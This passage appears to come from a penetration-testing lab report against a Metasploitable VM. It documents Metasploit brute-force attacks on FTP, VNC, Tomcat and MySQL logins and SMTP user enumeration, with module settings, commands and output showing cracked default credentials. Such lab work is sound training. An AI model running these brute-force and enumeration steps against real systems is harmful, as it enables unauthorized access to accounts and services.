[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:123123 (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:abc123 (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:master (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:monkey (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:letmein (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin: (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin: (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin: (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin: (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: postgres:user (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: postgres:admin (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: postgres:msfadmin (Incorrect: )
[+] 192.168.56.105:21 - 192.168.56.105:21 - Login Successful: postgres:postgres
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: super_admin:user (Incorrect: )
^C[*] 192.168.56.105:21 - Caught interrupt from the console ...
[*] Auxiliary module execution completed
```

We get 3 successful login for,

- user - user and password - user
- user - msfadmin and password - msfadmin
- user - postgres and password - postgres

Trying credentials received using metasploit in manual method

We try the credentials manually and hence, we get successful login on proftpd

```
root@kali:/# ftp 192.168.56.105 2121
Connected to 192.168.56.105.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.56.105]
Name (192.168.56.105:kali): user
331 Password required for user
Password:
230 User user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
```

```
ftp> pwd
257 "/home/user" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> ls -alt
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  3 user      user        4096 May  7  2010 .
-rw-----  1 user      user        165  May  7  2010 .bash_history
drwx-----  2 user      user        4096 May  7  2010 .ssh
drwxr-xr-x  6 root      root        4096 Apr 16  2010 ..
-rw-r--r--  1 user      user        220 Mar 31  2010 .bash_logout
-rw-r--r--  1 user      user       2928 Mar 31  2010 .bashrc
-rw-r--r--  1 user      user        586 Mar 31  2010 .profile
226 Transfer complete
ftp> exit
221 Goodbye.
root@kali:/# ftp 192.168.56.105 2121
Connected to 192.168.56.105.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.56.105]
Name (192.168.56.105:kali): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  7 msfadmin  msfadmin     4096 May  5 03:45 vulnerable
226 Transfer complete
ftp> pwd
257 "/home/msfadmin" is the current directory
ftp> exit
221 Goodbye.
```

OUTPUT: Through metasploit using ftp exploit module we tried to get successful login credentials and deployed those credentials in manual method to check if we can login in proftpd and hence, checking for two credentials (user & msfadmin) as sample it worked. Also basic shell commands were executed depicted in the screenshot.

16. VNC - Brute force

Out of 52 modules, only module for breaking authentication is used - **auxiliary/scanner/vnc/vnc_login**.

```
msf5 > search vnc_login

Matching Modules
=====
#  Name                               Disclosure Date  Rank   Check  Description
-  -----
0  auxiliary/scanner/vnc/vnc_login    normal        No     VNC Authentication Scanner
```

Checking for that module, and modifying the configurations under options. The RHOSTS is set to ip **192.168.56.105**, the USER_FILE and PASS_FILE are set to the **user.txt** and **pass.txt** which has names and passwords listed i created. The port name is already shown as **5900** for vnc. Also setting the **BRUTEFORCE_SPEED** to lowest to fasten the attack and **VERBOSE** set to **true**.

To stop after 1 successful login we have set **stop_on_success** to **true**.

The below screenshot shows all options after modified.

```
Module options (auxiliary/scanner/vnc/vnc_login):
Name      Current Setting  Required  Description
----      -----          ----- 
BLANK_PASSWORDS  false       no        Try blank passwords for all users
BRUTEFORCE_SPEED 3          yes      How fast to bruteforce, from 0 to 5
DB_ALL_CREDS    false       no        Try each user/password couple stored in the current database
DB_ALL_PASS     false       no        Add all passwords in the current database to the list
DB_ALL_USERS    false       no        Add all users in the current database to the list
PASSWORD        no          no        The password to test
PASS_FILE       ~/Desktop/pass.txt  no        File containing passwords, one per line
Proxies          no          no        A proxy chain of format type:host:port[,type:host:port][ ... ]
RHOSTS          192.168.56.105 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT           5900        yes      The target port (TCP)
STOP_ON_SUCCESS true        yes      Stop guessing when a credential works for a host
THREADS         1           yes      The number of concurrent threads (max one per host)
USERNAME         <BLANK>    no        A specific username to authenticate as
USERPASS_FILE   no          no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS    false       no        Try the username as the password for all users
USER_FILE        ~/Desktop/user.txt  no        File containing usernames, one per line
VERBOSE         true        yes      Whether to print output for all attempts
```

Activate V

After running with modified configurations, the user names are checked individually against every password for successful and failed logins. Thus, **brute force** is performed and we get the below,

```
msf5 auxiliary(scanner/vnc/vnc_login) > run
[*] 192.168.56.105:5900 - 192.168.56.105:5900 - Starting VNC login sweep
[!] 192.168.56.105:5900 - No active DB -- Credential data will not be saved!
[-] 192.168.56.105:5900 - 192.168.56.105:5900 - LOGIN FAILED: :admin (Incorrect: Authentication failed)
[-] 192.168.56.105:5900 - 192.168.56.105:5900 - LOGIN FAILED: :toor (Incorrect: Authentication failed)
[-] 192.168.56.105:5900 - 192.168.56.105:5900 - LOGIN FAILED: :1234 (Incorrect: Authentication failed)
[-] 192.168.56.105:5900 - 192.168.56.105:5900 - LOGIN FAILED: :letmein (Incorrect: Authentication failed)
[+] 192.168.56.105:5900 - 192.168.56.105:5900 - Login Successful: :password123
[*] 192.168.56.105:5900 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Here we get one successful login by supplying default passwords and run.

OUTPUT: All default user names and passwords are given in text files and set under basic settings. Hence got one successful login by brute forcing.

17. Tomcat - Brute force

The module **auxiliary/scanner/http/tomcat_mgr_login** is going to be used to break the authentication.

Matching Modules						
#	Name	Disclosure Date	Rank	Check	Description	
-	---					
0	auxiliary/admin/http/tomcat_administration		normal	No	Tomcat Administration Tool Default Access	
1	auxiliary/admin/http/tomcat_utf8_traversal	2009-01-09	normal	No	Tomcat UTF-8 Directory Traversal Vulnerability	
2	auxiliary/admin/http/trendmicro_dlp_traversal	2009-01-09	normal	No	TrendMicro Data Loss Prevention 5.5 Directory Traversal	
3	auxiliary/dos/http/apache_commons_fileupload_dos	2014-02-06	normal	No	Apache Commons FileUpload and Apache Tomcat DoS	
4	auxiliary/dos/http/apache_tomcat_transfer_encoding	2010-07-09	normal	No	Apache Tomcat Transfer-Encoding Information Disclosure	
and Dos						
5	auxiliary/dos/http/hashcollision_dos	2011-12-28	normal	No	Hashtable Collisions	
6	auxiliary/scanner/http/tomcat_enum		normal	No	Apache Tomcat User Enumeration	
7	auxiliary/scanner/http/tomcat_mgr_login		normal	No	Tomcat Application Manager Login Utility	
8	exploit/linux/http/cisco_prime_inf_rce	2018-10-04	excellent	Yes	Cisco Prime Infrastructure Unauthenticated Remote Code Execution	
Execution						
9	exploit/linux/http/cpi_tararchive_upload	2019-05-15	excellent	Yes	Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability	
10	exploit/multi/http/cisco_dcnm_upload_2019	2019-06-26	excellent	Yes	Cisco Data Center Network Manager Unauthenticated Remote Code Execution	
Code Execution						
11	exploit/multi/http/struts2_namespace_ognl	2018-08-22	excellent	Yes	Apache Struts 2 Namespace Redirect OGNL Injection	
12	exploit/multi/http/struts_code_exec_classloader	2014-03-06	manual	No	Apache Struts ClassLoader Manipulation Remote Code Execution	
d Code Execution						
13	exploit/multi/http/struts_dev_mode	2012-01-06	excellent	Yes	Apache Struts 2 Developer Mode OGNL Execution	
14	exploit/multi/http/tomcat_jsp_upload_bypass	2017-10-03	excellent	Yes	Tomcat RCE via JSP Upload Bypass	
15	exploit/multi/http/tomcat_mgr_deploy	2009-11-09	excellent	Yes	Apache Tomcat Manager Application Deployer Authenticate	
d Code Execution						
16	exploit/multi/http/tomcat_mgr_upload	2009-11-09	excellent	Yes	Apache Tomcat Manager Authenticated Upload Code Execution	
on						
17	exploit/multi/http/zenworks_configuration_management_upload	2015-04-07	excellent	Yes	Novell ZENworks Configuration Management Arbitrary File Upload	
18	exploit/windows/http/tomcat_cgi_cmdlineargs	2019-04-10	excellent	Yes	Apache Tomcat CGI Servlet enableCmdLineArguments Vulnerability	
bility						
19	post/multi/gather/tomcat_gather		normal	No	Gather Tomcat Credentials	
20	post/windows/gather/enum_tomcat		normal	No	Windows Gather Apache Tomcat Enumeration	

Activate Windows

Under the settings, the RHOSTS to server ip **192.168.56.105** and RPORT is set to **8180**.

The **stop-on-success** is set to true so, it stops when 1 successful login is found.

Module options (auxiliary/scanner/http/tomcat_mgr_login):		Required	Description
Name	Current Setting		
BLANK_PASSWORDS	false	no	Try blank passwords for all users
BRUTEFORCE_SPEED	5	yes	How fast to bruteforce, from 0 to 5
DB_ALL_CREDS	false	no	Try each user/password couple stored in the current database
DB_ALL_PASS	false	no	Add all passwords in the current database to the list
DB_ALL_USERS	false	no	Add all users in the current database to the list
PASSWORD		no	The HTTP password to specify for authentication
PASS_FILE	/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt	no	File containing passwords, one per line
Proxies		no	A proxy chain of format type:host:port[,type:host:port,...]
st:port][...]		yes	The target host(s), range CIDR identifier, or host:port
RHOSTS	192.168.56.105	yes	The target port (TCP)
hosts file with syntax 'file:<path>'		no	Negotiate SSL/TLS for outgoing connections
RPORT	8180	yes	Stop guessing when a credential works for a host
SSL	false	no	
STOP_ON_SUCCESS	true	yes	
TARGETURI	/manager/html	yes	URI for Manager login. Default is /manager/html
THREADS	1	yes	The number of concurrent threads (max one per host)
USERNAME		no	
USERPASS_FILE	/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt	no	The HTTP username to specify for authentication
y space, one pair per line		no	File containing users and passwords separated by a new line
USER_AS_PASS	false	no	Try the username as the password for all users
USER_FILE	/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt	no	File containing users, one per line
VERBOSE	true	yes	Whether to print output for all attempts
VHOST		no	HTTP server virtual host

```
[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.56.105:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.56.105:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

There is one successful login for **tomcat:tomcat** and the authentication is broke using brute force.

OUTPUT: Thus a successful login is achieved through the module by brute force attack.

18. MySQL - Brute force

Now we can use the **mysql_login** module in combination with our wordlists in order to discover at least one valid database account that will allow us to login to the MySQL database. It is always a good practice as a penetration tester to check the database for weak credentials.

```
msf5 > search mysql_login
Matching Modules
=====
#  Name                               Disclosure Date  Rank   Check  Description
-  ----
0  auxiliary/scanner/mysql/mysql_login          normal    No    MySQL Login Utility
```

Checking for that module, and modifying the configurations under options. The RHOSTS is set to ip **192.168.56.105**, the USER_FILE and PASS_FILE are set to the **user.txt** and **pass.txt** which has names and passwords listed i created. The port name is already shown as **3306** for mysql. Also setting the **BRUTEFORCE_SPEED** to lowest to fasten the attack and **VERBOSE** set to **true**.

To all successful logins we have set **stop_on_success** to **false**.

The below screenshot shows all options after modified.

Module options (auxiliary/scanner/mysql/mysql_login):				
Name	Current Setting	Required	Description	
BLANK_PASSWORDS	false	no	Try blank passwords for all users	
BRUTEFORCE_SPEED	2	yes	How fast to bruteforce, from 0 to 5	
DB_ALL_CREDS	false	no	Try each user/password couple stored in the current database	
DB_ALL_PASS	false	no	Add all passwords in the current database to the list	
DB_ALL_USERS	false	no	Add all users in the current database to the list	
PASSWORD		no	A specific password to authenticate with	
PASS_FILE	~/Desktop/pass.txt	no	File containing passwords, one per line	
Proxies		no	A proxy chain of format type:host:port[,type:host:port][...]	
RHOSTS	192.168.56.105	yes	The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'	
RPORT	3306	yes	The target port (TCP)	
STOP_ON_SUCCESS	false	yes	Stop guessing when a credential works for a host	
THREADS	1	yes	The number of concurrent threads (max one per host)	
USERNAME		no	A specific username to authenticate as	
USERPASS_FILE		no	File containing users and passwords separated by space, one pair per line	
USER_AS_PASS	false	no	Try the username as the password for all users	
USER_FILE	~/Desktop/user.txt	no	File containing usernames, one per line	
VERBOSE	true	yes	Whether to print output for all attempts	Activate \

```

msf5 auxiliary(scanner/mysql/mysql_login) > run
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.56.105:3306 - No active DB -- Credential data will not be saved!
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:admin (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:root (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:password123 (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:guest (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:toor (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:1234 (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:letmein (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin:password1 (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: YES))
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: NO))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.56.101' (using password: NO))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:admin (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:root (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:password123 (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
ES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:guest (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:toor (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:1234 (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:letmein (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: root:password1 (Incorrect: Access denied for user 'root'@'192.168.56.101' (using password: YES))
))
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - Success: 'root'
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:admin (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:root (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:password123 (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:guest (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - Activate Windows
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:toor (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:1234 (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:letmein (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123:password1 (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123: (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: NO))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: password123: (Incorrect: Access denied for user 'password123'@'192.168.56.101' (using password: NO))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:admin (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:root (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:password123 (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:guest (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:toor (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:1234 (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:letmein (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: guest:password1 (Incorrect: Access denied for user 'guest'@'192.168.56.101' (using password: YES))
[*] 192.168.56.105:3306 - 192.168.56.105:3306 - Success: 'guest'
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: toor:admin (Incorrect: Access denied for user 'toor'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: toor:root (Incorrect: Access denied for user 'toor'@'192.168.56.101' (using password: YES))
[-] 192.168.56.105:3306 - 192.168.56.105:3306 - LOGIN FAILED: toor:password123 (Incorrect: Access denied for user 'toor'@'192.168.56.101' (using password: YES))
ES))
[*] 192.168.56.105:3306 - Caught interrupt from the console ...
[*] Auxiliary module execution completed

```

Activate Windows
Go to PC settings to activate Windows.

At the start we have sql version **5.0.51a** exposed and two successful login attempts for **root** & **guest** which are not set to any passwords in the database.

OUTPUT: The scanner was successful and now as we can see from the results we have two valid accounts (**guest** and **root**) for remote connection. Both of these accounts they don't have a password set.

19. SMTP - User enumeration

Generally smtp are email environment setup for interaction between two users through a smtp mail server. One of the most commonly used in almost every organisations.

Now, we can use an exploit module **auxiliary/scanner/smtp/smtp_enum** which helps us connect to the mail server and use a wordlist to enumerate users that are present on the remote system.

To perform this username enumeration we use **EXPN & VRFY** commands.

The role of the EXPN command is to reveal the **actual address of users aliases** and **lists of email** and VRFY which **can confirm the existance of names of valid users**.

Usually system administrator must disable these commands to not perform any activity to get any of the user information. Hopefully pentesters can identify if they are disabled or not.

In the below 31 modules, we are using the 5th.

#	Name	Disclosure Date	Rank	Check	Description
<hr/>					
0	auxiliary/client/smtp/emailer		normal	No	Generic Emailer (SMTP)
1	auxiliary/dos/smtp/sendmail_prescan	2003-09-17	normal	No	Sendmail SMTP Address prescan Memory Corruption
2	auxiliary/dos/windows/smtp/ms06_019_exchange	2004-11-12	normal	No	MS06-019 Exchange MODPROP Heap Overflow
3	auxiliary/fuzzers/smtp/smtp_fuzzer		normal	No	SMTP Simple Fuzzer
4	auxiliary/scanner/http/gavazzi_em_login_loot		normal	No	Carlo Gavazzi Energy Meters - Login Brute Force, Extract Inf
o and Dump Plant Database					
5	auxiliary/scanner/smtp/smtp_enum		normal	No	SMTP User Enumeration Utility
6	auxiliary/scanner/smtp/smtp_ntlm_domain		normal	No	SMTP NTLM Domain Extraction
7	auxiliary/scanner/smtp/smtp_relay		normal	No	SMTP Open Relay Detection
8	auxiliary/scanner/smtp/smtp_version		normal	No	SMTP Banner Grabber
9	auxiliary/server/capture/smtp		normal	No	Authentication Capture: SMTP
10	auxiliary/vsploit/pii/email_pii		normal	No	VSploit Email PII
11	exploit/linux/smtp/exim4_dovecot_exec	2013-05-03	excellent	No	Exim and Dovecot Insecure Configuration Command Injection
12	exploit/linux/smtp/exim_gethostbyname_bof	2015-01-27	great	Yes	Exim GHOST (glibc gethostbyname) Buffer Overflow
13	exploit/linux/smtp/haraka	2017-01-26	excellent	Yes	Haraka SMTP Command Injection
14	exploit/unix/smtp/clamav_milter_blackhole	2007-08-24	excellent	No	ClamAV Milter Blackhole-Mode Remote Code Execution
15	exploit/unix/smtp/exim4_string_format	2010-12-07	excellent	No	Exim4 string_format Function Heap Buffer Overflow
16	exploit/unix/smtp/morris_sendmail_debug	1988-11-02	average	Yes	Morris Worm sendmail Debug Mode Shell Escape
17	exploit/unix/smtp/qmail_bash_env_exec	2014-09-24	normal	No	Qmail SMTP Bash Environment Variable Injection (Shellshock)
18	exploit/unix/webapp/squirrelmail_pgp_plugin	2007-07-09	manual	No	SquirrelMail PGP Plugin Command Execution (SMTP)
19	exploit/windows/browser/communicrypt_mail_activex	2010-05-19	great	No	Communicrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
20	exploit/windows/browser/oracle_dc_submittoexpress	2009-08-28	normal	No	Oracle Document Capture 10g ActiveX Control Buffer Overflow
21	exploit/windows/email/ms07_017_ani_loadimage_chunksize	2007-03-28	great	No	Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (
SMTP)					
22	exploit/windows/http/mdaemon_worldclient_form2raw	2003-12-29	great	Yes	MDaemon WorldClient form2raw.cgi Stack Buffer Overflow
23	exploit/windows/smtp/mailcarrier_smtp_ehlo	2004-10-26	good	Yes	TABS MailCarrier v2.51 SMTP EHLO Overflow
24	exploit/windows/smtp/mercury_cram_md5	2007-08-18	great	No	Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
25	exploit/windows/smtp/ms03_046_exchange2000_xexch50	2003-10-15	good	Yes	MS03-046 Exchange 2000 XEXCH50 Heap Overflow
26	exploit/windows/smtp/njstar_smtp_bof	2011-10-31	normal	Yes	NJStar Communicator 3.00 MiniSMTP Buffer Overflow
27	exploit/windows/smtp/sysgauge_client_bof	2017-02-28	normal	No	SysGauge SMTP Validation Buffer Overflow
28	exploit/windows/smtp/wmailserver	2005-07-11	average	No	SoftiaCom WMailserver 1.0 Buffer Overflow
29	exploit/windows/smtp/yopps_overflow1	2004-09-27	average	Yes	YPOPS 0.6 Buffer Overflow
30	exploit/windows/ssl/ms04_011_pct	2004-04-13	average	No	MS04-011 Microsoft Private Communications Transport Overflow
31	post/windows/gather/credentials/outlook		normal	No	Windows Gather Microsoft Outlook Saved Password Extraction

In the below settings, it is enough to set the rhosts to remote host address and run the module.

```

Module options (auxiliary/scanner/smtp/smtp_enum):
-----  

Name      Current Setting  

-----  

RHOSTS    192.168.56.105  

file<path>  

RPORT     25  

THREADS   1  

UNIXONLY  true  

USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt  

Required  Description  

-----  

yes       The target host(s), range CIDR identifier, or hosts file with syntax 'f  

yes       The target port (TCP)  

yes       The number of concurrent threads (max one per host)  

yes       Skip Microsoft bannered servers when testing unix users  

yes       The file that contains a list of probable users accounts.  

  

msf5 auxiliary(scanner/smtp/smtp_enum) > show advanced  

  

Module advanced options (auxiliary/scanner/smtp/smtp_enum):
-----  

Name      Current Setting  Required  Description  

-----  

CHOST    no               The local client address  

CPORT    no               The local client port  

ConnectTimeout 10          yes      Maximum number of seconds to establish a TCP connection  

Proxies   no               A proxy chain of format type:host:port[,type:host:port][ ... ]  

SSL      false            no       Negotiate SSL/TLS for outgoing connections  

SSLCipher no               String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"  

SSLVerifyMode PEER           no       SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)  

SSLVersion Auto             yes      Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SS  

L23, SSL3, TLS1, TLS1.1, TLS1.2)  

ShowProgress true            yes      Display progress messages during a scan  

ShowProgressPercent 10        yes      The interval in percent that progress should be shown  

VERBOSE   false            no       Enable detailed status messages  

WORKSPACE no               Specify the workspace for this module

```

Activate Windows

```

msf5 auxiliary(scanner/smtp/smtp_enum) > run  

  

[*] 192.168.56.105:25 - 192.168.56.105:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)  

  

[+] 192.168.56.105:25 - 192.168.56.105:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuuid, list, lp, mail, man, news, nobody,  

postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data  

[*] 192.168.56.105:25 - Scanned 1 of 1 hosts (100% complete)  

[*] Auxiliary module execution completed

```

Thus we can see the users being found when executed.

Trying using manual method

SMTP enumeration can be implemented through the Nmap as well. There is a script in the NSE (Nmap Scripting Engine) that can be used for SMTP user enumeration. The generic usage of the script is the following:

```
nmap --script smtp-enum-users.nse host_name
```

```
root@kali:/# nmap --script smtp-enum-users.nse 192.168.56.105
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 17:09 EDT
Nmap scan report for 192.168.56.105
Host is up (0.0019s latency).
Not shown: 977 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
5432/tcp  open  postgresql
5900/tcp  open  vnc
